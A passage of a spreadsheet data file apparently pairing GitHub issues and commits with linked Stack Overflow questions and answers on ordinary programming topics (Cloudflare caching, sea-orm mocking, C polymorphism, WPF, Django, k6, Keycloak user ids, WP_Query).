&lt;/code&gt;&lt;/pre&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Cache Level: Cache Everything&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Edge Cache TTL: 1 Year&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Browser Cache TTL: 1 Day&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Override Cache-Control Header: Enabled&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Serve Stale Content: Enabled&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Am I missing something?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C444</t>
  </si>
  <si>
    <t>fix: improve ChannelList performance by improving threshold calls and rerenders of Header (#1919)
* fix: channel list performance issue due to multiple calls
* fix: channellist multiple query channels calls issue
* fix: removed unused vars from app.tsx of TSMessagingapp
* fix: removed redundant console.logs
* fix: removed redundant console.logs
* docs: added documentation of loadMoreThreshold prop
* refactor: update yarn.lock files and var name change
* refactor: update yarn.lock files
* docs: improve prop documentation
// https://stackoverflow.com/a/60666252/10826415</t>
  </si>
  <si>
    <t>This solution worked for me. Add onMomentumScrollBegin and modify onEndReached in FlatList Component.</t>
  </si>
  <si>
    <t xml:space="preserve">I've started working on a fairly complicated software. It is for a personal project, but nonetheless I'm putting a lot of effort into it.
Now, I'm used to work on other people's solutions / designs or on projects that grow in a very controllable way.
This time, I started twice to code the basics and I rapidly found myself stuck. So i took a rest and decided to write down the complete solution before coding a single line. What I've done (in order) is:
writing the use cases in the form of CLI commands (this is a command line application)
write some help
design the classes, the structure of the data files and the functional workflow for the various parts.
Now, I'm going really slow in this whole part. I've set up a personal wiki and I'm using it to write those specifications, but i clearly feel my lack of experience and a clear methodology.
I'm aware that software design is a very complex subject and that a pletora of books have been written about it, but I'd love you to share your experience / advices / methodology.
When working on personal, middle-sized projects, what do you specify before starting to code? How?
Thanks in advance
</t>
  </si>
  <si>
    <t>C445</t>
  </si>
  <si>
    <t>widget design 
Current widgets have no reflection support. It's impossible to detect "object type" by generic lv_obj_t* pointer.
This cause "hacks" like in themes https://github.com/lvgl/lvgl/blob/master/src/lv_widgets/lv_btn.c#L95, with hardcoded global constants. Why global? Because if you add foreign widgets, those constants still have to be globally unique.
What is suggested:
Create explicit type id, and store it in each lv_obj struct.
To protect from collisions, add register_widget_type() method, and throw/message if duplicate found. I don't know if this can be checked in compile time. But runtime check is still much better than nothing.
you can call it lazily on first create, if user forgot that. Or error on attempt of unregistered widget create.
In worst case, if 3rd-par widgets have collision - use guards to redefine type value via -D
That will cost +1 byte per lv_obj, but will allow to implement some "impossible" things:
Implement generic fabric for any-widget-create.
Implement delegated event listener (global one on root node, instead of local on each item).
Now this can be hacked via analyse of widget-specific class (check if exists), assigned by theme. But that's not normal to hack reflection via theme's kludge, instead of implicit type announce.
more: https://stackoverflow.com/questions/351733/how-would-one-write-object-oriented-code-in-c</t>
  </si>
  <si>
    <t>Since you're talking about polymorphism then yes, you can, we were doing that sort of stuff years before C++ came about.
Basically you use a struct to hold both the data and a list of function pointers to point to the relevant functions for that data.
So, in a communications class, you would have an open, read, write and close call which would be maintained as four function pointers in the structure, alongside the data for an object, something like:
typedef struct {
    int (*open)(void *self, char *fspec);
    int (*close)(void *self);
    int (*read)(void *self, void *buff, size_t max_sz, size_t *p_act_sz);
    int (*write)(void *self, void *buff, size_t max_sz, size_t *p_act_sz);
    // And data goes here.
} tCommClass;
tCommClass commRs232;
commRs232.open = &amp;rs232Open;
: :
commRs232.write = &amp;rs232Write;
tCommClass commTcp;
commTcp.open = &amp;tcpOpen;
: :
commTcp.write = &amp;tcpWrite;
Of course, those code segments above would actually be in a "constructor" such as rs232Init().
When you 'inherit' from that class, you just change the pointers to point to your own functions. Everyone that called those functions would do it through the function pointers, giving you your polymorphism:
int stat = (commTcp.open)(commTcp, "bigiron.box.com:5000");
Sort of like a manual vtable.
You could even have virtual classes by setting the pointers to NULL -the behaviour would be slightly different to C++ (a core dump at run-time rather than an error at compile time).
Here's a piece of sample code that demonstrates it. First the top-level class structure:
#include &lt;stdio.h&gt;
// The top-level class.
typedef struct sCommClass {
    int (*open)(struct sCommClass *self, char *fspec);
} tCommClass;
Then we have the functions for the TCP 'subclass':
// Function for the TCP 'class'.
static int tcpOpen (tCommClass *tcp, char *fspec) {
    printf ("Opening TCP: %s\n", fspec);
    return 0;
}
static int tcpInit (tCommClass *tcp) {
    tcp-&gt;open = &amp;tcpOpen;
    return 0;
}
And the HTTP one as well:
// Function for the HTTP 'class'.
static int httpOpen (tCommClass *http, char *fspec) {
    printf ("Opening HTTP: %s\n", fspec);
    return 0;
}
static int httpInit (tCommClass *http) {
    http-&gt;open = &amp;httpOpen;
    return 0;
}
And finally a test program to show it in action:
// Test program.
int main (void) {
    int status;
    tCommClass commTcp, commHttp;
    // Same 'base' class but initialised to different sub-classes.
    tcpInit (&amp;commTcp);
    httpInit (&amp;commHttp);
    // Called in exactly the same manner.
    status = (commTcp.open)(&amp;commTcp, "bigiron.box.com:5000");
    status = (commHttp.open)(&amp;commHttp, "http://www.microsoft.com");
    return 0;
}
This produces the output:
Opening TCP: bigiron.box.com:5000
Opening HTTP: http://www.microsoft.com
so you can see that the different functions are being called, depending on the sub-class.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to test a function that checks if a space exists in the database using sea-orm's MockDatabase. The function performs a COUNT query, but my test is failing.&lt;/p&gt;
&lt;h2&gt;Here's my repository code:&lt;/h2&gt;
&lt;pre class="lang-rust prettyprint-override"&gt;&lt;code&gt;pub async fn space_check_exist(db: &amp;amp;DatabaseConnection, space_id: &amp;amp;str) -&amp;gt; Result&amp;lt;bool, DbErr&amp;gt; {
    let count = Space::find()
        .filter(space::Column::SpaceId.eq(space_id))
        .count(db)
        .await?;
    Ok(count &amp;gt; 0)
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;And here's my test code:&lt;/h2&gt;
&lt;pre class="lang-rust prettyprint-override"&gt;&lt;code&gt;#[tokio::test]
async fn test_space_check_exist_when_space_exists() {
    let db = MockDatabase::new(DatabaseBackend::Postgres)
        .append_query_results([vec![space::Model {
            id: 1,
            space_id: &amp;quot;test-space-id&amp;quot;.to_owned(),
            space_status_id: 1,
            space_config: Json::Null,
            created_at: chrono::Utc::now().naive_utc(),
            updated_at: chrono::Utc::now().naive_utc(),
            deleted_at: None,
        } as space::Model] as Vec&amp;lt;space::Model&amp;gt;])
        .into_connection();
    // Run test
    let result = SpaceRepository::space_check_exist(&amp;amp;db, &amp;quot;test-space-id&amp;quot;).await;
    // Verify result
    // assert!(result.is_ok());
    assert!(result.unwrap());
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;The result.is_ok() test fails with:&lt;/h2&gt;
&lt;pre class="lang-bash prettyprint-override"&gt;&lt;code&gt;thread 'modules::space::repository::space_repository::tests::test_space_check_exist_when_space_exists' panicked at src/modules/space/repository/space_repository.rs:41:9:
assertion failed: result.is_ok()
&lt;/code&gt;&lt;/pre&gt;
&lt;pre class="lang-bash prettyprint-override"&gt;&lt;code&gt;   Compiling myapp v0.1.0 (/opt/app/myapp/app)
    Finished `test` profile [unoptimized + debuginfo] target(s) in 11.08s
     Running unittests src/lib.rs (target/debug/deps/myapp-23ce339f247c6933)
running 1 test
test modules::space::repository::space_repository::tests::test_space_check_exist_when_space_exists ... FAILED
successes:
successes:
failures:
---- modules::space::repository::space_repository::tests::test_space_check_exist_when_space_exists stdout ----
thread 'modules::space::repository::space_repository::tests::test_space_check_exist_when_space_exists' panicked at src/modules/space/repository/space_repository.rs:41:9:
assertion failed: result.is_ok()
stack backtrace:
   0: rust_begin_unwind
             at /rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf/library/std/src/panicking.rs:665:5
   1: core::panicking::panic_fmt
             at /rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf/library/core/src/panicking.rs:74:14
   2: core::panicking::panic
             at /rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf/library/core/src/panicking.rs:148:5
   3: myapp::modules::space::repository::space_repository::tests::test_space_check_exist_when_space_exists::{{closure}}
             at ./src/modules/space/repository/space_repository.rs:41:9
   4: &amp;lt;core::pin::Pin&amp;lt;P&amp;gt; as core::future::future::Future&amp;gt;::poll
             at /usr/local/rustup/toolchains/1.83.0-aarch64-unknown-linux-gnu/lib/rustlib/src/rust/library/core/src/future/future.rs:123:9
   5: &amp;lt;core::pin::Pin&amp;lt;P&amp;gt; as core::future::future::Future&amp;gt;::poll
             at /usr/local/rustup/toolchains/1.83.0-aarch64-unknown-linux-gnu/lib/rustlib/src/rust/library/core/src/future/future.rs:123:9
   6: tokio::runtime::scheduler::current_thread::CoreGuard::block_on::{{closure}}::{{closure}}::{{closure}}
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/scheduler/current_thread/mod.rs:729:57
   7: tokio::runtime::coop::with_budget
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/coop.rs:107:5
   8: tokio::runtime::coop::budget
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/coop.rs:73:5
   9: tokio::runtime::scheduler::current_thread::CoreGuard::block_on::{{closure}}::{{closure}}
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/scheduler/current_thread/mod.rs:729:25
  10: tokio::runtime::scheduler::current_thread::Context::enter
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/scheduler/current_thread/mod.rs:428:19
  11: tokio::runtime::scheduler::current_thread::CoreGuard::block_on::{{closure}}
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/scheduler/current_thread/mod.rs:728:36
  12: tokio::runtime::scheduler::current_thread::CoreGuard::enter::{{closure}}
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/scheduler/current_thread/mod.rs:807:68
  13: tokio::runtime::context::scoped::Scoped&amp;lt;T&amp;gt;::set
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/context/scoped.rs:40:9
  14: tokio::runtime::context::set_scheduler::{{closure}}
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/context.rs:180:26
  15: std::thread::local::LocalKey&amp;lt;T&amp;gt;::try_with
             at /usr/local/rustup/toolchains/1.83.0-aarch64-unknown-linux-gnu/lib/rustlib/src/rust/library/std/src/thread/local.rs:283:12
  16: std::thread::local::LocalKey&amp;lt;T&amp;gt;::with
             at /usr/local/rustup/toolchains/1.83.0-aarch64-unknown-linux-gnu/lib/rustlib/src/rust/library/std/src/thread/local.rs:260:9
  17: tokio::runtime::context::set_scheduler
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/context.rs:180:9
  18: tokio::runtime::scheduler::current_thread::CoreGuard::enter
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/scheduler/current_thread/mod.rs:807:27
  19: tokio::runtime::scheduler::current_thread::CoreGuard::block_on
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/scheduler/current_thread/mod.rs:716:19
  20: tokio::runtime::scheduler::current_thread::CurrentThread::block_on::{{closure}}
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/scheduler/current_thread/mod.rs:196:28
  21: tokio::runtime::context::runtime::enter_runtime
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/context/runtime.rs:65:16
  22: tokio::runtime::scheduler::current_thread::CurrentThread::block_on
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/scheduler/current_thread/mod.rs:184:9
  23: tokio::runtime::runtime::Runtime::block_on_inner
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/runtime.rs:368:47
  24: tokio::runtime::runtime::Runtime::block_on
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/runtime.rs:342:13
  25: myapp::modules::space::repository::space_repository::tests::test_space_check_exist_when_space_exists
             at ./src/modules/space/repository/space_repository.rs:41:9
  26: myapp::modules::space::repository::space_repository::tests::test_space_check_exist_when_space_exists::{{closure}}
             at ./src/modules/space/repository/space_repository.rs:24:56
  27: core::ops::function::FnOnce::call_once
             at /usr/local/rustup/toolchains/1.83.0-aarch64-unknown-linux-gnu/lib/rustlib/src/rust/library/core/src/ops/function.rs:250:5
  28: core::ops::function::FnOnce::call_once
             at /rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf/library/core/src/ops/function.rs:250:5
note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.
failures:
    modules::space::repository::space_repository::tests::test_space_check_exist_when_space_exists
test result: FAILED. 0 passed; 1 failed; 0 ignored; 0 measured; 87 filtered out; finished in 0.10s
error: test failed, to rerun pass `-p myapp --lib`
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;The assert!(result.unwrap()); test fails with:&lt;/h2&gt;
&lt;pre class="lang-bash prettyprint-override"&gt;&lt;code&gt;   Compiling myapp v0.1.0 (/opt/app/myapp/app)
    Finished `test` profile [unoptimized + debuginfo] target(s) in 9.65s
     Running unittests src/lib.rs (target/debug/deps/myapp-23ce339f247c6933)
running 1 test
test modules::space::repository::space_repository::tests::test_space_check_exist_when_space_exists ... FAILED
successes:
successes:
failures:
---- modules::space::repository::space_repository::tests::test_space_check_exist_when_space_exists stdout ----
thread 'modules::space::repository::space_repository::tests::test_space_check_exist_when_space_exists' panicked at src/modules/space/repository/space_repository.rs:42:24:
called `Result::unwrap()` on an `Err` value: Type(&amp;quot;A null value was encountered while decoding \&amp;quot;num_items\&amp;quot;&amp;quot;)
stack backtrace:
   0: rust_begin_unwind
             at /rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf/library/std/src/panicking.rs:665:5
   1: core::panicking::panic_fmt
             at /rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf/library/core/src/panicking.rs:74:14
   2: core::result::unwrap_failed
             at /rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf/library/core/src/result.rs:1700:5
   3: core::result::Result&amp;lt;T,E&amp;gt;::unwrap
             at /usr/local/rustup/toolchains/1.83.0-aarch64-unknown-linux-gnu/lib/rustlib/src/rust/library/core/src/result.rs:1104:23
   4: myapp::modules::space::repository::space_repository::tests::test_space_check_exist_when_space_exists::{{closure}}
             at ./src/modules/space/repository/space_repository.rs:42:17
   5: &amp;lt;core::pin::Pin&amp;lt;P&amp;gt; as core::future::future::Future&amp;gt;::poll
             at /usr/local/rustup/toolchains/1.83.0-aarch64-unknown-linux-gnu/lib/rustlib/src/rust/library/core/src/future/future.rs:123:9
   6: &amp;lt;core::pin::Pin&amp;lt;P&amp;gt; as core::future::future::Future&amp;gt;::poll
             at /usr/local/rustup/toolchains/1.83.0-aarch64-unknown-linux-gnu/lib/rustlib/src/rust/library/core/src/future/future.rs:123:9
   7: tokio::runtime::scheduler::current_thread::CoreGuard::block_on::{{closure}}::{{closure}}::{{closure}}
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/scheduler/current_thread/mod.rs:729:57
   8: tokio::runtime::coop::with_budget
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/coop.rs:107:5
   9: tokio::runtime::coop::budget
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/coop.rs:73:5
  10: tokio::runtime::scheduler::current_thread::CoreGuard::block_on::{{closure}}::{{closure}}
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/scheduler/current_thread/mod.rs:729:25
  11: tokio::runtime::scheduler::current_thread::Context::enter
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/scheduler/current_thread/mod.rs:428:19
  12: tokio::runtime::scheduler::current_thread::CoreGuard::block_on::{{closure}}
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/scheduler/current_thread/mod.rs:728:36
  13: tokio::runtime::scheduler::current_thread::CoreGuard::enter::{{closure}}
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/scheduler/current_thread/mod.rs:807:68
  14: tokio::runtime::context::scoped::Scoped&amp;lt;T&amp;gt;::set
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/context/scoped.rs:40:9
  15: tokio::runtime::context::set_scheduler::{{closure}}
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/context.rs:180:26
  16: std::thread::local::LocalKey&amp;lt;T&amp;gt;::try_with
             at /usr/local/rustup/toolchains/1.83.0-aarch64-unknown-linux-gnu/lib/rustlib/src/rust/library/std/src/thread/local.rs:283:12
  17: std::thread::local::LocalKey&amp;lt;T&amp;gt;::with
             at /usr/local/rustup/toolchains/1.83.0-aarch64-unknown-linux-gnu/lib/rustlib/src/rust/library/std/src/thread/local.rs:260:9
  18: tokio::runtime::context::set_scheduler
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/context.rs:180:9
  19: tokio::runtime::scheduler::current_thread::CoreGuard::enter
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/scheduler/current_thread/mod.rs:807:27
  20: tokio::runtime::scheduler::current_thread::CoreGuard::block_on
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/scheduler/current_thread/mod.rs:716:19
  21: tokio::runtime::scheduler::current_thread::CurrentThread::block_on::{{closure}}
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/scheduler/current_thread/mod.rs:196:28
  22: tokio::runtime::context::runtime::enter_runtime
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/context/runtime.rs:65:16
  23: tokio::runtime::scheduler::current_thread::CurrentThread::block_on
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/scheduler/current_thread/mod.rs:184:9
  24: tokio::runtime::runtime::Runtime::block_on_inner
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/runtime.rs:368:47
  25: tokio::runtime::runtime::Runtime::block_on
             at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/runtime/runtime.rs:342:13
  26: myapp::modules::space::repository::space_repository::tests::test_space_check_exist_when_space_exists
             at ./src/modules/space/repository/space_repository.rs:42:9
  27: myapp::modules::space::repository::space_repository::tests::test_space_check_exist_when_space_exists::{{closure}}
             at ./src/modules/space/repository/space_repository.rs:24:56
  28: core::ops::function::FnOnce::call_once
             at /usr/local/rustup/toolchains/1.83.0-aarch64-unknown-linux-gnu/lib/rustlib/src/rust/library/core/src/ops/function.rs:250:5
  29: core::ops::function::FnOnce::call_once
             at /rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf/library/core/src/ops/function.rs:250:5
note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.
failures:
    modules::space::repository::space_repository::tests::test_space_check_exist_when_space_exists
test result: FAILED. 0 passed; 1 failed; 0 ignored; 0 measured; 87 filtered out; finished in 0.09s
error: test failed, to rerun pass `-p myapp --lib`
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've tried various approaches to mock the COUNT query result:&lt;/p&gt;
&lt;p&gt;Using a full space::Model
Using MockRow with different configurations&lt;/p&gt;
&lt;p&gt;But I can't get it to work. How can I correctly mock a COUNT query result in sea-orm?
Environment:&lt;/p&gt;
&lt;p&gt;Rust 1.83.0
sea-orm 1.1.4&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C446</t>
  </si>
  <si>
    <t>How can I access page controls from another page
Using messenger mediator pattern in MVVM 
Because of the nature of dealing with Types, you're gonna have a decent amount of resistance trying to specifically manipulate controls from the parent window because of things like initialization of the page and other nuances that stem from this "type" vs. "instance" thing.
Again, there is not a necessarily "right" way to do everything (MVVM is a pattern, not gospel) -- however from the phrasing of your question it seems like you're a bit unfamiliar with WPF as a whole (nothing wrong with that of course, also please correct me if I'm wrong on that assessment). I'm not sure what you're looking to accomplish, but even if you are not using MVVM you might want to think about the logic behind why you're trying to do things like manipulate checkboxes or control contents from a window presenting a page. Typically pages are meant to be used similar to a webpages, sort of self-contained things where they are just presented from a frame or other container.
If you are super hell-bent on trying to do that, this answer from SO might point you in the right direction: https://stackoverflow.com/a/42072602/15744261
If that doesn't get you in the ballpark, you could look into implementing a really simple messenger type class that just dispatches "messages" to your program (each of the controls you want to "listen" on would subscribe in their constructor or something), and whatever controls are listening would consume it and "do something" based on what the message/contents are. This one isn't super beginner friendly so take it with a grain of salt -- but it would be a bit better than directly referring to and manipulating controls via window and page classes. This question might whet your appetite a bit to read more on it: https://softwareengineering.stackexchange.com/questions/380778/when-to-use-the-messenger-mediator-pattern-in-mvvm-design</t>
  </si>
  <si>
    <t>The TextBox is not part of the Frame's template. It is part of the Page's Content.
If you set the x:FieldModifier attribute of the TextBox in SubPage.xaml to public or internal or expose it through a property of the SubPage.xaml.cs class...:
&lt;TextBox x:Name="textName" Text="TextBox" x:FieldModifier="public"/&gt;
...you can get a reference to it by casting the Content property of the Frame to a SubPage once the page has been navigated to:
public partial class MainWindow : Window
{
    public MainWindow()
    {
        InitializeComponent();
        frame0.Navigated += Frame0_Navigated;
    }
    private void Frame0_Navigated(object sender, System.Windows.Navigation.NavigationEventArgs e)
    {
        SubPage subPage = frame0.Content as SubPage;
        if (subPage != null)
        {
            TextBox textName = subPage.textName;
        }
        //remove the event handler
        frame0.Navigated -= Frame0_Navigated;
    }
}
Before this there is no Page nor TextBox because the instance of the SubPage hasn't yet been created.</t>
  </si>
  <si>
    <t xml:space="preserve">A few weeks ago I asked the question "Is a PHP, Python, PostgreSQL design suitable for a non-web business application?" [external-link]
A lot of the answers recommended skipping the PHP piece and using Django to build the application. As I've explored Django, I've started to question one specific aspect of my goals and how Django comes into play for a non-web business application.
Based on my understanding, Django would manage both the view and controller pieces and PostgreSQL or MySQL would handle the data. But my goal was to clearly separate the layers so that the database, domain logic, and presentation could each be changed without significantly affecting the others. It seems like I'm only separating the M from the VC layers with the Django solution.
So, is it counterproductive for me to build the domain layer in Python with an SQL Alchemy/Elixir ORM tool, PostgreSQL for the database layer, and then still use Django or PHP for the presentation layer? Is this possible or pure insanity?
Basically, I'd be looking at an architecture of Django/PHP &gt; Python/SQLAlchemy &gt; PostgreSQL/MySQL.
Edit: Before the fanboys get mad at me for asking a question about Django, just realize: It's a question, not an accusation. If I knew the answer or had my own opinion, I wouldn't have asked!
</t>
  </si>
  <si>
    <t>C447</t>
  </si>
  <si>
    <t>VIVO-742: Move the SearchEngine behind an interface
Replacing SolrQueryTest?
http://stackoverflow.com/questions/936723/testing-solr-via-embedded-server</t>
  </si>
  <si>
    <t>You can start with the SolrExampleTests which extends SolrExampleTestBase which extends AbstractSolrTestCase .
Also this SampleTest.
Also take a look at this and this threads.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Iâ€™m working on performance testing with Grafana K6 and trying to structure my test scripts to avoid redundancy. So Iâ€™ve implemented a class-based approach. Here's a sample code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const metrics = new MetricsBuilder();
const k6Runner = new K6Runner();
export const setup = () =&amp;gt; k6Runner.doSetup();
export const options = k6Runner.getOptions();
export default () =&amp;gt; k6Runner.run();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;MetricsBuilder&lt;/code&gt; class is designed to hold various metrics (including custom ones) and make them reusable across multiple test scripts. I want to keep the codebase clean, as there will be multiple test scripts and need to avoid redundancy.&lt;/p&gt;
&lt;p&gt;However, I have a few concerns:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;# Init Context and SharedArray Behavior&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;According to the documentation, the &lt;code&gt;init context&lt;/code&gt; runs once per Virtual User (VU), while a &lt;code&gt;SharedArray&lt;/code&gt; is only initialized once and shared across all VUs. Iâ€™ve noticed that the &lt;code&gt;MetricsBuilder&lt;/code&gt; class gets initialized for every VU in the init context, but I donâ€™t see any significant difference in the reports. Does K6 handle it appropriately?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;# Is it a bad practice to use a class like MetricsBuilder in this context?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Does initializing the same object multiple times in the &lt;code&gt;init context&lt;/code&gt; (one per VU) have any negative impact on performance or results?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;# Initialization of Classes in the Init Context&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Iâ€™ve noticed that initializing a class like &lt;code&gt;K6Runner&lt;/code&gt; in the &lt;code&gt;init context&lt;/code&gt; (e.g., &lt;code&gt;const k6Runner = new K6Runner();&lt;/code&gt;) results in the same number of instances being created as the number of VUs.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;# Is this approach considered a bad practice?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Would this lead to any issues, such as resource overuse or unexpected side effects?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;# Constructor Approach with SharedArray&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;If we pass multiple datasets from different &lt;code&gt;SharedArray&lt;/code&gt; instances to a constructor in the &lt;code&gt;K6Runner&lt;/code&gt;, are there any known issues or limitations? I havenâ€™t encountered any problems so far, but I want to ensure this is a safe practice in K6.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;# Best Practices for Class-Based K6 Scripts&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Are there any best practices for using a class-based approach in K6 scripts for managing metrics and modularizing test execution logic?&lt;/p&gt;
&lt;p&gt;I would appreciate any insights or recommendations for structuring large-scale k6 test scripts to avoid redundancy while maintaining performance and accuracy. Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C448</t>
  </si>
  <si>
    <t>Developers could reuse user ids and unknowingly violate the OIDC spec
I'm not sure that this is breaking compliance with the spec. Our user API is acting more like a conduit to the database than an enforcement of any particular protocol or specification. While a stretch, you could then say that PostgreSQL is not spec compliant because they allow id reuse. It is up to the developer to ensure they are compliant or not. I don't think this is the job of our User API.
Additionally, there might be other specifications that don't have this constraint and therefore could conflict with OIDC is this manner.
Also, user ids have a wide-range of applications and implications in FusionAuth currently and that is going to be expanding when we implement #1 and other features. Since developer ergonomics is a core principle of the platform, we don't want to make it more challenging for developers to try and reason through reasons why API calls start failing or users aren't able to login. Specifically, we want to avoid issues like: https://stackoverflow.com/questions/46529363/specify-user-id-when-creating-user-in-keycloak. We often encounter these types of situations and our approach is always to allow the maximum of flexibility without compromising security.
Just considering how Connectors work, this change could cause issues for anyone leveraging a Connector. If the Connector isn't migrating users, this could have even more issues.</t>
  </si>
  <si>
    <t>Running into this issue when attempting to create users via the API, I looked into the code for the users service. It looks like it is currently not possible to set the user id due to how the user is created.
From the code in
https://github.com/keycloak/keycloak/blob/master/services/src/main/java/org/keycloak/services/resources/admin/UsersResource.java
specifically on line
https://github.com/keycloak/keycloak/blob/7cfe6addf01676939206e034a87c791460031032/services/src/main/java/org/keycloak/services/resources/admin/UsersResource.java#L115
the user is first created using the username, then updated. I believe id is not an updatable field. Thus it is not currently possible.</t>
  </si>
  <si>
    <t xml:space="preserve">I have noticed over the years that different developers have different criteria for what constitutes a tier in the development of an n-tier system so I was curious about what the consensus is here at stackoverflow.
Is separate logical layers sufficient to call it a separate tier or does it have to be deployable on a separate server (physical or virtual) in order to call it a separate tier?
Let me phrase the question a little bit differently. If the calling mechanism can only be in process, thread local, or apartment local, then is it possible to claim that it is two different tiers depending on how the classes are organized into libraries or packages?
</t>
  </si>
  <si>
    <t>C449</t>
  </si>
  <si>
    <t>Query schema for orderby inside where is not intuitive
At the end of the day, this is built for WP. Trying to tell WP how they, and their entire community "should be doing things" isn't going to be received well. You're essentially telling them what they've done is "bad" and that your way is better. That negates their entire codebase, the documentation that goes with it, the countless SO questions etc. For example https://stackoverflow.com/questions/40850559/wp-query-post-not-in-not-working
Take a look at the answer and you'll see what I mean. That person was able to answer the question because WP_QUERY is well documented and countless devs like us can use it without even having to look at the documentation.
Now in with your syntax, that answer is irrelevant as it doesn't correlate with your syntax. This is a HUGE sticking point, as you're throwing out all the convention...this comprehensive knowledge that exists through the internet and the entire WP community, just because you think "your way is better". I'm sorry to say, and I mean no disrespect, but if you think you can redefine wp's conventions and they'll just adopt...well that will NEVER ever happen. Instead of expecting people to adopt to your syntax and re-learn how to do things, why not simply adopt the conventions that have been battle tested.</t>
  </si>
  <si>
    <t>I ran your code and it worked fine for me, except there is an extra space after 'post__not_in '.  Do you see it?  Make sure you have the key as 'post__not_in'.
Also, there are a couple of things to mention:
It's 'post_type' and not 'posttype.
